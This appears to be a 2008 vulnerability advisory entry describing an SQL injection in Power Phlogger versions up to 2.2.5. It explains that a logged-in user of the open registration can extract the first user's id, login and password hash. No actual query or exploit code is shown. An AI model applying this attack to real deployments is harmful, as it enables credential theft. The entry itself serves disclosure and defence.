Vendor: Power Phlogger
By: MustLive
CVSS: 8.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Power Phlogger
Affected Version From: Power Phlogger <= 2.2.5
Affected Version To: Power Phlogger <= 2.2.5
Patch Exists: YES
Related CWE: N/A
CPE: a:power_phlogger:power_phlogger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
SQL Injection vulnerability in Power Phlogger
SQL Injection vulnerability in Power Phlogger, a PHP/MySQL logging tool that tracks visitors via counters. To perform the SQL Injection attack you need to be logged into an account, which can be freely obtained via the open registration form. With this query you will receive the id, login and password (hash) of the first user.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.